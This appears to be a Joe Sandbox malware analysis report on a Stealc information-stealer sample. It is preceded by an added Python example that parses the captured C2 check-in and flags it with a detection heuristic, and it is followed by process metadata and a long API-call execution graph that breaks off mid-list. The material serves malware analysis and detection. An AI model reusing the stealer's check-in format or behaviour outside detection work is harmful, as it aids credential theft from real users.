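The exchange above, as an added example that is not part of the report and not Stealc or Joe Sandbox code: the request body and reply are rebuilt from the report's Data Raw/Data Ascii lines, a minimal multipart/form-data parser pulls out the `hwid` and `build` fields, the reply is base64-decoded and classified, and a detection predicate tests a request against the shape of this check-in. The predicate is this example's own heuristic, not the SEKOIA Suricata rule that fired, and treating any reply other than "block" as accepted is an assumption (this capture shows only the refusal).

```python
"""Parser and detection logic for the Stealc C2 check-in captured in the
report. Added example, not Joe Sandbox or Stealc code; the heuristic below is
this example's own, not the Suricata rule that fired."""
import base64
import re

REQUEST_PATH = "/e2b1563c6670f193.php"
REQUEST_CONTENT_TYPE = "multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDH"
# POST body rebuilt from the report's Data Ascii (211 bytes, matching Content-Length)
REQUEST_BODY = (
    b"------JKECGHCFIJDAAKFHJJDH\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"6A5EB7216C1A2447771074\r\n"
    b"------JKECGHCFIJDAAKFHJJDH\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"puma\r\n"
    b"------JKECGHCFIJDAAKFHJJDH--\r\n"
)
# 8-byte reply body, from the report's Data Raw line
RESPONSE_BODY = bytes.fromhex("59 6d 78 76 59 32 73 3d")


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value as text}."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delimiter = b"--" + m.group(1).encode()
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # closing delimiter, nothing follows
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part without header/body separator")
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = value.rstrip(b"\r\n").decode("utf-8", "replace")
    return fields


def decode_reply(body: bytes) -> str:
    """Stealc answers in base64; raises ValueError on a reply that is not valid base64."""
    return base64.b64decode(body, validate=True).decode("utf-8", "replace")


def classify_reply(body: bytes) -> str:
    """'blocked' for the refusal seen in this capture; 'accepted' otherwise
    (assumption: any other reply is a token for the next stage, which this
    capture does not show); 'undecodable' for non-base64 bodies."""
    try:
        text = decode_reply(body)
    except ValueError:
        return "undecodable"
    return "blocked" if text == "block" else "accepted"


def looks_like_stealc_checkin(method: str, path: str, content_type: str, body: bytes) -> bool:
    """Example heuristic: POST to /<16 hex chars>.php whose multipart body carries
    exactly the hwid and build fields, with a hex hwid, as in the captured request."""
    if method != "POST" or not re.fullmatch(r"/[0-9a-f]{16}\.php", path):
        return False
    if not content_type.lower().startswith("multipart/form-data"):
        return False
    try:
        fields = parse_multipart(content_type, body)
    except ValueError:
        return False
    return set(fields) == {"hwid", "build"} and bool(re.fullmatch(r"[0-9A-F]+", fields["hwid"]))


if __name__ == "__main__":
    print(parse_multipart(REQUEST_CONTENT_TYPE, REQUEST_BODY))
    print(decode_reply(RESPONSE_BODY), classify_reply(RESPONSE_BODY))
    print(looks_like_stealc_checkin("POST", REQUEST_PATH, REQUEST_CONTENT_TYPE, REQUEST_BODY))
```

On the captured bytes this yields `{'hwid': '6A5EB7216C1A2447771074', 'build': 'puma'}`, a decoded reply of `block` classified as `blocked`, and a positive match from the heuristic; a request with any other field set, a non-hex hwid or a path that is not a 16-hex-character .php does not match, which keeps the predicate from firing on ordinary multipart uploads.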



                            Target ID:0
                            Start time:08:03:57
                            Start date:27/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x9e0000
                            File size:1'866'752 bytes
                            MD5 hash:D42E9BEBEB9D3F72398F5A5211B649E1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2101658537.000000000139E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2051322816.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:7.8%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:10.1%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
14625->14626 14627 9e15d9 14626->14627 14628 9fa7a0 lstrcpy 14627->14628 14629 9e1663 14628->14629 14630 9f5510 14629->14630 14631 9f5521 14630->14631 14632 9fa820 2 API calls 14631->14632 14633 9f552e 14632->14633 14634 9fa820 2 API calls 14633->14634 14635 9f553b 14634->14635 14636 9fa820 2 API calls 14635->14636 14637 9f5548 14636->14637 14638 9fa740 lstrcpy 14637->14638 14639 9f5555 14638->14639 14640 9fa740 lstrcpy 14639->14640 14641 9f5562 14640->14641 14642 9fa740 lstrcpy 14641->14642 14643 9f556f 14642->14643 14644 9fa740 lstrcpy 14643->14644 14682 9f557c 14644->14682 14645 9fa820 lstrlen lstrcpy 14645->14682 14646 9fa740 lstrcpy 14646->14682 14647 9fa8a0 lstrcpy 14647->14682 14648 9f5643 StrCmpCA 14648->14682 14649 9f56a0 StrCmpCA 14650 9f57dc 14649->14650 14649->14682 14651 9fa8a0 lstrcpy 14650->14651 14652 9f57e8 14651->14652 14653 9fa820 2 API calls 14652->14653 14656 9f57f6 14653->14656 14654 9f5856 StrCmpCA 14657 9f5991 14654->14657 14654->14682 14655 9f51f0 20 API calls 14655->14682 14658 9fa820 2 API calls 14656->14658 14659 9fa8a0 lstrcpy 14657->14659 14660 9f5805 14658->14660 14662 9f599d 14659->14662 14661 9e1670 lstrcpy 14660->14661 14681 9f5811 14661->14681 14663 9fa820 2 API calls 14662->14663 14666 9f59ab 14663->14666 14664 9f5a0b StrCmpCA 14667 9f5a28 14664->14667 14668 9f5a16 Sleep 14664->14668 14665 9f52c0 25 API calls 14665->14682 14669 9fa820 2 API calls 14666->14669 14671 9fa8a0 lstrcpy 14667->14671 14668->14682 14670 9f59ba 14669->14670 14672 9e1670 lstrcpy 14670->14672 14673 9f5a34 14671->14673 14672->14681 14674 9fa820 2 API calls 14673->14674 14675 9f5a43 14674->14675 14676 9fa820 2 API calls 14675->14676 14677 9f5a52 14676->14677 14679 9e1670 lstrcpy 14677->14679 14678 9f578a StrCmpCA 14678->14682 14679->14681 14680 9fa7a0 lstrcpy 14680->14682 14681->13737 14682->14645 14682->14646 14682->14647 14682->14648 14682->14649 14682->14654 14682->14655 14682->14664 14682->14665 14682->14678 14682->14680 14683 9f593f StrCmpCA 14682->14683 
14684 9e1590 lstrcpy 14682->14684 14683->14682 14684->14682 14686 9f754c 14685->14686 14687 9f7553 GetVolumeInformationA 14685->14687 14686->14687 14689 9f7591 14687->14689 14688 9f75fc GetProcessHeap RtlAllocateHeap 14690 9f7619 14688->14690 14691 9f7628 wsprintfA 14688->14691 14689->14688 14693 9fa740 lstrcpy 14690->14693 14692 9fa740 lstrcpy 14691->14692 14694 9f5da7 14692->14694 14693->14694 14694->13758 14696 9fa7a0 lstrcpy 14695->14696 14697 9e4899 14696->14697 15747 9e47b0 14697->15747 14699 9e48a5 14700 9fa740 lstrcpy 14699->14700 14701 9e48d7 14700->14701 14702 9fa740 lstrcpy 14701->14702 14703 9e48e4 14702->14703 14704 9fa740 lstrcpy 14703->14704 14705 9e48f1 14704->14705 14706 9fa740 lstrcpy 14705->14706 14707 9e48fe 14706->14707 14708 9fa740 lstrcpy 14707->14708 14709 9e490b InternetOpenA StrCmpCA 14708->14709 14710 9e4944 14709->14710 14711 9e4ecb InternetCloseHandle 14710->14711 15753 9f8b60 14710->15753 14713 9e4ee8 14711->14713 15768 9e9ac0 CryptStringToBinaryA 14713->15768 14714 9e4963 15761 9fa920 14714->15761 14717 9e4976 14719 9fa8a0 lstrcpy 14717->14719 14724 9e497f 14719->14724 14720 9fa820 2 API calls 14721 9e4f05 14720->14721 14723 9fa9b0 4 API calls 14721->14723 14722 9e4f27 ctype 14726 9fa7a0 lstrcpy 14722->14726 14725 9e4f1b 14723->14725 14728 9fa9b0 4 API calls 14724->14728 14727 9fa8a0 lstrcpy 14725->14727 14739 9e4f57 14726->14739 14727->14722 14729 9e49a9 14728->14729 14730 9fa8a0 lstrcpy 14729->14730 14731 9e49b2 14730->14731 14732 9fa9b0 4 API calls 14731->14732 14733 9e49d1 14732->14733 14734 9fa8a0 lstrcpy 14733->14734 14735 9e49da 14734->14735 14736 9fa920 3 API calls 14735->14736 14737 9e49f8 14736->14737 14738 9fa8a0 lstrcpy 14737->14738 14740 9e4a01 14738->14740 14739->13761 14741 9fa9b0 4 API calls 14740->14741 14742 9e4a20 14741->14742 14743 9fa8a0 lstrcpy 14742->14743 14744 9e4a29 14743->14744 14745 9fa9b0 4 API calls 14744->14745 14746 9e4a48 14745->14746 14747 9fa8a0 lstrcpy 14746->14747 14748 9e4a51 14747->14748 14749 
9fa9b0 4 API calls 14748->14749 14750 9e4a7d 14749->14750 14751 9fa920 3 API calls 14750->14751 14752 9e4a84 14751->14752 14753 9fa8a0 lstrcpy 14752->14753 14754 9e4a8d 14753->14754 14755 9e4aa3 InternetConnectA 14754->14755 14755->14711 14756 9e4ad3 HttpOpenRequestA 14755->14756 14758 9e4ebe InternetCloseHandle 14756->14758 14759 9e4b28 14756->14759 14758->14711 14760 9fa9b0 4 API calls 14759->14760 14761 9e4b3c 14760->14761 14762 9fa8a0 lstrcpy 14761->14762 14763 9e4b45 14762->14763 14764 9fa920 3 API calls 14763->14764 14765 9e4b63 14764->14765 14766 9fa8a0 lstrcpy 14765->14766 14767 9e4b6c 14766->14767 14768 9fa9b0 4 API calls 14767->14768 14769 9e4b8b 14768->14769 14770 9fa8a0 lstrcpy 14769->14770 14771 9e4b94 14770->14771 14772 9fa9b0 4 API calls 14771->14772 14773 9e4bb5 14772->14773 14774 9fa8a0 lstrcpy 14773->14774 14775 9e4bbe 14774->14775 14776 9fa9b0 4 API calls 14775->14776 14777 9e4bde 14776->14777 14778 9fa8a0 lstrcpy 14777->14778 14779 9e4be7 14778->14779 14780 9fa9b0 4 API calls 14779->14780 14781 9e4c06 14780->14781 14782 9fa8a0 lstrcpy 14781->14782 14783 9e4c0f 14782->14783 14784 9fa920 3 API calls 14783->14784 14785 9e4c2d 14784->14785 14786 9fa8a0 lstrcpy 14785->14786 14787 9e4c36 14786->14787 14788 9fa9b0 4 API calls 14787->14788 14789 9e4c55 14788->14789 14790 9fa8a0 lstrcpy 14789->14790 14791 9e4c5e 14790->14791 14792 9fa9b0 4 API calls 14791->14792 14793 9e4c7d 14792->14793 14794 9fa8a0 lstrcpy 14793->14794 14795 9e4c86 14794->14795 14796 9fa920 3 API calls 14795->14796 14797 9e4ca4 14796->14797 14798 9fa8a0 lstrcpy 14797->14798 14799 9e4cad 14798->14799 14800 9fa9b0 4 API calls 14799->14800 14801 9e4ccc 14800->14801 14802 9fa8a0 lstrcpy 14801->14802 14803 9e4cd5 14802->14803 14804 9fa9b0 4 API calls 14803->14804 14805 9e4cf6 14804->14805 14806 9fa8a0 lstrcpy 14805->14806 14807 9e4cff 14806->14807 14808 9fa9b0 4 API calls 14807->14808 14809 9e4d1f 14808->14809 14810 9fa8a0 lstrcpy 14809->14810 14811 9e4d28 14810->14811 14812 9fa9b0 4 API 
calls 14811->14812 14813 9e4d47 14812->14813 14814 9fa8a0 lstrcpy 14813->14814 14815 9e4d50 14814->14815 14816 9fa920 3 API calls 14815->14816 14817 9e4d6e 14816->14817 14818 9fa8a0 lstrcpy 14817->14818 14819 9e4d77 14818->14819 14820 9fa740 lstrcpy 14819->14820 14821 9e4d92 14820->14821 14822 9fa920 3 API calls 14821->14822 14823 9e4db3 14822->14823 14824 9fa920 3 API calls 14823->14824 14825 9e4dba 14824->14825 14826 9fa8a0 lstrcpy 14825->14826 14827 9e4dc6 14826->14827 14828 9e4de7 lstrlen 14827->14828 14829 9e4dfa 14828->14829 14830 9e4e03 lstrlen 14829->14830 15767 9faad0 14830->15767 14832 9e4e13 HttpSendRequestA 14833 9e4e32 InternetReadFile 14832->14833 14834 9e4e67 InternetCloseHandle 14833->14834 14839 9e4e5e 14833->14839 14836 9fa800 14834->14836 14836->14758 14837 9fa9b0 4 API calls 14837->14839 14838 9fa8a0 lstrcpy 14838->14839 14839->14833 14839->14834 14839->14837 14839->14838 15774 9faad0 14840->15774 14842 9f17c4 StrCmpCA 14843 9f17cf ExitProcess 14842->14843 14844 9f17d7 14842->14844 14845 9f19c2 14844->14845 14846 9f187f StrCmpCA 14844->14846 14847 9f185d StrCmpCA 14844->14847 14848 9f1913 StrCmpCA 14844->14848 14849 9f1932 StrCmpCA 14844->14849 14850 9f18f1 StrCmpCA 14844->14850 14851 9f1951 StrCmpCA 14844->14851 14852 9f1970 StrCmpCA 14844->14852 14853 9f18cf StrCmpCA 14844->14853 14854 9f18ad StrCmpCA 14844->14854 14855 9fa820 lstrlen lstrcpy 14844->14855 14845->13763 14846->14844 14847->14844 14848->14844 14849->14844 14850->14844 14851->14844 14852->14844 14853->14844 14854->14844 14855->14844 14857 9fa7a0 lstrcpy 14856->14857 14858 9e5979 14857->14858 14859 9e47b0 2 API calls 14858->14859 14860 9e5985 14859->14860 14861 9fa740 lstrcpy 14860->14861 14862 9e59ba 14861->14862 14863 9fa740 lstrcpy 14862->14863 14864 9e59c7 14863->14864 14865 9fa740 lstrcpy 14864->14865 14866 9e59d4 14865->14866 14867 9fa740 lstrcpy 14866->14867 14868 9e59e1 14867->14868 14869 9fa740 lstrcpy 14868->14869 14870 9e59ee InternetOpenA StrCmpCA 14869->14870 14871 
9e5a1d 14870->14871 14872 9e5fc3 InternetCloseHandle 14871->14872 14874 9f8b60 3 API calls 14871->14874 14873 9e5fe0 14872->14873 14877 9e9ac0 4 API calls 14873->14877 14875 9e5a3c 14874->14875 14876 9fa920 3 API calls 14875->14876 14878 9e5a4f 14876->14878 14879 9e5fe6 14877->14879 14880 9fa8a0 lstrcpy 14878->14880 14881 9fa820 2 API calls 14879->14881 14883 9e601f ctype 14879->14883 14885 9e5a58 14880->14885 14882 9e5ffd 14881->14882 14884 9fa9b0 4 API calls 14882->14884 14887 9fa7a0 lstrcpy 14883->14887 14886 9e6013 14884->14886 14889 9fa9b0 4 API calls 14885->14889 14888 9fa8a0 lstrcpy 14886->14888 14897 9e604f 14887->14897 14888->14883 14890 9e5a82 14889->14890 14891 9fa8a0 lstrcpy 14890->14891 14892 9e5a8b 14891->14892 14893 9fa9b0 4 API calls 14892->14893 14894 9e5aaa 14893->14894 14895 9fa8a0 lstrcpy 14894->14895 14896 9e5ab3 14895->14896 14898 9fa920 3 API calls 14896->14898 14897->13769 14899 9e5ad1 14898->14899 14900 9fa8a0 lstrcpy 14899->14900 14901 9e5ada 14900->14901 14902 9fa9b0 4 API calls 14901->14902 14903 9e5af9 14902->14903 14904 9fa8a0 lstrcpy 14903->14904 14905 9e5b02 14904->14905 14906 9fa9b0 4 API calls 14905->14906 14907 9e5b21 14906->14907 14908 9fa8a0 lstrcpy 14907->14908 14909 9e5b2a 14908->14909 14910 9fa9b0 4 API calls 14909->14910 14911 9e5b56 14910->14911 14912 9fa920 3 API calls 14911->14912 14913 9e5b5d 14912->14913 14914 9fa8a0 lstrcpy 14913->14914 14915 9e5b66 14914->14915 14916 9e5b7c InternetConnectA 14915->14916 14916->14872 14917 9e5bac HttpOpenRequestA 14916->14917 14919 9e5c0b 14917->14919 14920 9e5fb6 InternetCloseHandle 14917->14920 14921 9fa9b0 4 API calls 14919->14921 14920->14872 14922 9e5c1f 14921->14922 14923 9fa8a0 lstrcpy 14922->14923 14924 9e5c28 14923->14924 14925 9fa920 3 API calls 14924->14925 14926 9e5c46 14925->14926 14927 9fa8a0 lstrcpy 14926->14927 14928 9e5c4f 14927->14928 14929 9fa9b0 4 API calls 14928->14929 14930 9e5c6e 14929->14930 14931 9fa8a0 lstrcpy 14930->14931 14932 9e5c77 14931->14932 14933 
9fa9b0 4 API calls 14932->14933 14934 9e5c98 14933->14934 14935 9fa8a0 lstrcpy 14934->14935 14936 9e5ca1 14935->14936 14937 9fa9b0 4 API calls 14936->14937 14938 9e5cc1 14937->14938 14939 9fa8a0 lstrcpy 14938->14939 14940 9e5cca 14939->14940 14941 9fa9b0 4 API calls 14940->14941 14942 9e5ce9 14941->14942 14943 9fa8a0 lstrcpy 14942->14943 14944 9e5cf2 14943->14944 14945 9fa920 3 API calls 14944->14945 14946 9e5d10 14945->14946 14947 9fa8a0 lstrcpy 14946->14947 14948 9e5d19 14947->14948 14949 9fa9b0 4 API calls 14948->14949 14950 9e5d38 14949->14950 14951 9fa8a0 lstrcpy 14950->14951 14952 9e5d41 14951->14952 14953 9fa9b0 4 API calls 14952->14953 14954 9e5d60 14953->14954 14955 9fa8a0 lstrcpy 14954->14955 14956 9e5d69 14955->14956 14957 9fa920 3 API calls 14956->14957 14958 9e5d87 14957->14958 14959 9fa8a0 lstrcpy 14958->14959 14960 9e5d90 14959->14960 14961 9fa9b0 4 API calls 14960->14961 14962 9e5daf 14961->14962 14963 9fa8a0 lstrcpy 14962->14963 14964 9e5db8 14963->14964 14965 9fa9b0 4 API calls 14964->14965 14966 9e5dd9 14965->14966 14967 9fa8a0 lstrcpy 14966->14967 14968 9e5de2 14967->14968 14969 9fa9b0 4 API calls 14968->14969 14970 9e5e02 14969->14970 14971 9fa8a0 lstrcpy 14970->14971 14972 9e5e0b 14971->14972 14973 9fa9b0 4 API calls 14972->14973 14974 9e5e2a 14973->14974 14975 9fa8a0 lstrcpy 14974->14975 14976 9e5e33 14975->14976 14977 9fa920 3 API calls 14976->14977 14978 9e5e54 14977->14978 14979 9fa8a0 lstrcpy 14978->14979 14980 9e5e5d 14979->14980 14981 9e5e70 lstrlen 14980->14981 15775 9faad0 14981->15775 14983 9e5e81 lstrlen GetProcessHeap RtlAllocateHeap 15776 9faad0 14983->15776 14985 9e5eae lstrlen 14986 9e5ebe 14985->14986 14987 9e5ed7 lstrlen 14986->14987 14988 9e5ee7 14987->14988 14989 9e5ef0 lstrlen 14988->14989 14990 9e5f03 14989->14990 14991 9e5f1a lstrlen 14990->14991 15777 9faad0 14991->15777 14993 9e5f2a HttpSendRequestA 14994 9e5f35 InternetReadFile 14993->14994 14995 9e5f6a InternetCloseHandle 14994->14995 14999 9e5f61 14994->14999 
14995->14920 14997 9fa9b0 4 API calls 14997->14999 14998 9fa8a0 lstrcpy 14998->14999 14999->14994 14999->14995 14999->14997 14999->14998 15001 9f1077 15000->15001 15002 9f1151 15001->15002 15003 9fa820 lstrlen lstrcpy 15001->15003 15002->13771 15003->15001 15005 9f0db7 15004->15005 15006 9f0f17 15005->15006 15007 9f0e27 StrCmpCA 15005->15007 15008 9f0e67 StrCmpCA 15005->15008 15009 9f0ea4 StrCmpCA 15005->15009 15010 9fa820 lstrlen lstrcpy 15005->15010 15006->13779 15007->15005 15008->15005 15009->15005 15010->15005 15012 9f0f67 15011->15012 15013 9f1044 15012->15013 15014 9f0fb2 StrCmpCA 15012->15014 15015 9fa820 lstrlen lstrcpy 15012->15015 15013->13787 15014->15012 15015->15012 15017 9fa740 lstrcpy 15016->15017 15018 9f1a26 15017->15018 15019 9fa9b0 4 API calls 15018->15019 15020 9f1a37 15019->15020 15021 9fa8a0 lstrcpy 15020->15021 15022 9f1a40 15021->15022 15023 9fa9b0 4 API calls 15022->15023 15024 9f1a5b 15023->15024 15025 9fa8a0 lstrcpy 15024->15025 15026 9f1a64 15025->15026 15027 9fa9b0 4 API calls 15026->15027 15028 9f1a7d 15027->15028 15029 9fa8a0 lstrcpy 15028->15029 15030 9f1a86 15029->15030 15031 9fa9b0 4 API calls 15030->15031 15032 9f1aa1 15031->15032 15033 9fa8a0 lstrcpy 15032->15033 15034 9f1aaa 15033->15034 15035 9fa9b0 4 API calls 15034->15035 15036 9f1ac3 15035->15036 15037 9fa8a0 lstrcpy 15036->15037 15038 9f1acc 15037->15038 15039 9fa9b0 4 API calls 15038->15039 15040 9f1ae7 15039->15040 15041 9fa8a0 lstrcpy 15040->15041 15042 9f1af0 15041->15042 15043 9fa9b0 4 API calls 15042->15043 15044 9f1b09 15043->15044 15045 9fa8a0 lstrcpy 15044->15045 15046 9f1b12 15045->15046 15047 9fa9b0 4 API calls 15046->15047 15048 9f1b2d 15047->15048 15049 9fa8a0 lstrcpy 15048->15049 15050 9f1b36 15049->15050 15051 9fa9b0 4 API calls 15050->15051 15052 9f1b4f 15051->15052 15053 9fa8a0 lstrcpy 15052->15053 15054 9f1b58 15053->15054 15055 9fa9b0 4 API calls 15054->15055 15056 9f1b76 15055->15056 15057 9fa8a0 lstrcpy 15056->15057 15058 9f1b7f 15057->15058 15059 
9f7500 6 API calls 15058->15059 15060 9f1b96 15059->15060 15061 9fa920 3 API calls 15060->15061 15062 9f1ba9 15061->15062 15063 9fa8a0 lstrcpy 15062->15063 15064 9f1bb2 15063->15064 15065 9fa9b0 4 API calls 15064->15065 15066 9f1bdc 15065->15066 15067 9fa8a0 lstrcpy 15066->15067 15068 9f1be5 15067->15068 15069 9fa9b0 4 API calls 15068->15069 15070 9f1c05 15069->15070 15071 9fa8a0 lstrcpy 15070->15071 15072 9f1c0e 15071->15072 15778 9f7690 GetProcessHeap RtlAllocateHeap 15072->15778 15075 9fa9b0 4 API calls 15076 9f1c2e 15075->15076 15077 9fa8a0 lstrcpy 15076->15077 15078 9f1c37 15077->15078 15079 9fa9b0 4 API calls 15078->15079 15080 9f1c56 15079->15080 15081 9fa8a0 lstrcpy 15080->15081 15082 9f1c5f 15081->15082 15083 9fa9b0 4 API calls 15082->15083 15084 9f1c80 15083->15084 15085 9fa8a0 lstrcpy 15084->15085 15086 9f1c89 15085->15086 15785 9f77c0 GetCurrentProcess IsWow64Process 15086->15785 15089 9fa9b0 4 API calls 15090 9f1ca9 15089->15090 15091 9fa8a0 lstrcpy 15090->15091 15092 9f1cb2 15091->15092 15093 9fa9b0 4 API calls 15092->15093 15094 9f1cd1 15093->15094 15095 9fa8a0 lstrcpy 15094->15095 15096 9f1cda 15095->15096 15097 9fa9b0 4 API calls 15096->15097 15098 9f1cfb 15097->15098 15099 9fa8a0 lstrcpy 15098->15099 15100 9f1d04 15099->15100 15101 9f7850 3 API calls 15100->15101 15102 9f1d14 15101->15102 15103 9fa9b0 4 API calls 15102->15103 15104 9f1d24 15103->15104 15105 9fa8a0 lstrcpy 15104->15105 15106 9f1d2d 15105->15106 15107 9fa9b0 4 API calls 15106->15107 15108 9f1d4c 15107->15108 15109 9fa8a0 lstrcpy 15108->15109 15110 9f1d55 15109->15110 15111 9fa9b0 4 API calls 15110->15111 15112 9f1d75 15111->15112 15113 9fa8a0 lstrcpy 15112->15113 15114 9f1d7e 15113->15114 15115 9f78e0 3 API calls 15114->15115 15116 9f1d8e 15115->15116 15117 9fa9b0 4 API calls 15116->15117 15118 9f1d9e 15117->15118 15119 9fa8a0 lstrcpy 15118->15119 15120 9f1da7 15119->15120 15121 9fa9b0 4 API calls 15120->15121 15122 9f1dc6 15121->15122 15123 9fa8a0 lstrcpy 15122->15123 15124 9f1dcf 
15123->15124 15125 9fa9b0 4 API calls 15124->15125 15126 9f1df0 15125->15126 15127 9fa8a0 lstrcpy 15126->15127 15128 9f1df9 15127->15128 15787 9f7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15128->15787 15131 9fa9b0 4 API calls 15132 9f1e19 15131->15132 15133 9fa8a0 lstrcpy 15132->15133 15134 9f1e22 15133->15134 15135 9fa9b0 4 API calls 15134->15135 15136 9f1e41 15135->15136 15137 9fa8a0 lstrcpy 15136->15137 15138 9f1e4a 15137->15138 15139 9fa9b0 4 API calls 15138->15139 15140 9f1e6b 15139->15140 15141 9fa8a0 lstrcpy 15140->15141 15142 9f1e74 15141->15142 15789 9f7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15142->15789 15145 9fa9b0 4 API calls 15146 9f1e94 15145->15146 15147 9fa8a0 lstrcpy 15146->15147 15148 9f1e9d 15147->15148 15149 9fa9b0 4 API calls 15148->15149 15150 9f1ebc 15149->15150 15151 9fa8a0 lstrcpy 15150->15151 15152 9f1ec5 15151->15152 15153 9fa9b0 4 API calls 15152->15153 15154 9f1ee5 15153->15154 15155 9fa8a0 lstrcpy 15154->15155 15156 9f1eee 15155->15156 15792 9f7b00 GetUserDefaultLocaleName 15156->15792 15159 9fa9b0 4 API calls 15160 9f1f0e 15159->15160 15161 9fa8a0 lstrcpy 15160->15161 15162 9f1f17 15161->15162 15163 9fa9b0 4 API calls 15162->15163 15164 9f1f36 15163->15164 15165 9fa8a0 lstrcpy 15164->15165 15166 9f1f3f 15165->15166 15167 9fa9b0 4 API calls 15166->15167 15168 9f1f60 15167->15168 15169 9fa8a0 lstrcpy 15168->15169 15170 9f1f69 15169->15170 15796 9f7b90 15170->15796 15172 9f1f80 15173 9fa920 3 API calls 15172->15173 15174 9f1f93 15173->15174 15175 9fa8a0 lstrcpy 15174->15175 15176 9f1f9c 15175->15176 15177 9fa9b0 4 API calls 15176->15177 15178 9f1fc6 15177->15178 15179 9fa8a0 lstrcpy 15178->15179 15180 9f1fcf 15179->15180 15181 9fa9b0 4 API calls 15180->15181 15182 9f1fef 15181->15182 15183 9fa8a0 lstrcpy 15182->15183 15184 9f1ff8 15183->15184 15808 9f7d80 GetSystemPowerStatus 15184->15808 15187 9fa9b0 4 API calls 15188 9f2018 15187->15188 15189 9fa8a0 lstrcpy 15188->15189 15190 9f2021 15189->15190 15191 
9fa9b0 4 API calls 15190->15191 15192 9f2040 15191->15192 15193 9fa8a0 lstrcpy 15192->15193 15194 9f2049 15193->15194 15195 9fa9b0 4 API calls 15194->15195 15196 9f206a 15195->15196 15197 9fa8a0 lstrcpy 15196->15197 15198 9f2073 15197->15198 15199 9f207e GetCurrentProcessId 15198->15199 15810 9f9470 OpenProcess 15199->15810 15202 9fa920 3 API calls 15203 9f20a4 15202->15203 15204 9fa8a0 lstrcpy 15203->15204 15205 9f20ad 15204->15205 15206 9fa9b0 4 API calls 15205->15206 15207 9f20d7 15206->15207 15208 9fa8a0 lstrcpy 15207->15208 15209 9f20e0 15208->15209 15210 9fa9b0 4 API calls 15209->15210 15211 9f2100 15210->15211 15212 9fa8a0 lstrcpy 15211->15212 15213 9f2109 15212->15213 15815 9f7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15213->15815 15216 9fa9b0 4 API calls 15217 9f2129 15216->15217 15218 9fa8a0 lstrcpy 15217->15218 15219 9f2132 15218->15219 15220 9fa9b0 4 API calls 15219->15220 15221 9f2151 15220->15221 15222 9fa8a0 lstrcpy 15221->15222 15223 9f215a 15222->15223 15224 9fa9b0 4 API calls 15223->15224 15225 9f217b 15224->15225 15226 9fa8a0 lstrcpy 15225->15226 15227 9f2184 15226->15227 15819 9f7f60 15227->15819 15230 9fa9b0 4 API calls 15231 9f21a4 15230->15231 15232 9fa8a0 lstrcpy 15231->15232 15233 9f21ad 15232->15233 15234 9fa9b0 4 API calls 15233->15234 15235 9f21cc 15234->15235 15236 9fa8a0 lstrcpy 15235->15236 15237 9f21d5 15236->15237 15238 9fa9b0 4 API calls 15237->15238 15239 9f21f6 15238->15239 15240 9fa8a0 lstrcpy 15239->15240 15241 9f21ff 15240->15241 15832 9f7ed0 GetSystemInfo wsprintfA 15241->15832 15244 9fa9b0 4 API calls 15245 9f221f 15244->15245 15246 9fa8a0 lstrcpy 15245->15246 15247 9f2228 15246->15247 15248 9fa9b0 4 API calls 15247->15248 15249 9f2247 15248->15249 15250 9fa8a0 lstrcpy 15249->15250 15251 9f2250 15250->15251 15252 9fa9b0 4 API calls 15251->15252 15253 9f2270 15252->15253 15254 9fa8a0 lstrcpy 15253->15254 15255 9f2279 15254->15255 15834 9f8100 GetProcessHeap RtlAllocateHeap 15255->15834 15258 9fa9b0 4 API calls 15259 
9f2299 15258->15259 15260 9fa8a0 lstrcpy 15259->15260 15261 9f22a2 15260->15261 15262 9fa9b0 4 API calls 15261->15262 15263 9f22c1 15262->15263 15264 9fa8a0 lstrcpy 15263->15264 15265 9f22ca 15264->15265 15266 9fa9b0 4 API calls 15265->15266 15267 9f22eb 15266->15267 15268 9fa8a0 lstrcpy 15267->15268 15269 9f22f4 15268->15269 15840 9f87c0 15269->15840 15272 9fa920 3 API calls 15273 9f231e 15272->15273 15274 9fa8a0 lstrcpy 15273->15274 15275 9f2327 15274->15275 15276 9fa9b0 4 API calls 15275->15276 15277 9f2351 15276->15277 15278 9fa8a0 lstrcpy 15277->15278 15279 9f235a 15278->15279 15280 9fa9b0 4 API calls 15279->15280 15281 9f237a 15280->15281 15282 9fa8a0 lstrcpy 15281->15282 15283 9f2383 15282->15283 15284 9fa9b0 4 API calls 15283->15284 15285 9f23a2 15284->15285 15286 9fa8a0 lstrcpy 15285->15286 15287 9f23ab 15286->15287 15845 9f81f0 15287->15845 15289 9f23c2 15290 9fa920 3 API calls 15289->15290 15291 9f23d5 15290->15291 15292 9fa8a0 lstrcpy 15291->15292 15293 9f23de 15292->15293 15294 9fa9b0 4 API calls 15293->15294 15295 9f240a 15294->15295 15296 9fa8a0 lstrcpy 15295->15296 15297 9f2413 15296->15297 15298 9fa9b0 4 API calls 15297->15298 15299 9f2432 15298->15299 15300 9fa8a0 lstrcpy 15299->15300 15301 9f243b 15300->15301 15302 9fa9b0 4 API calls 15301->15302 15303 9f245c 15302->15303 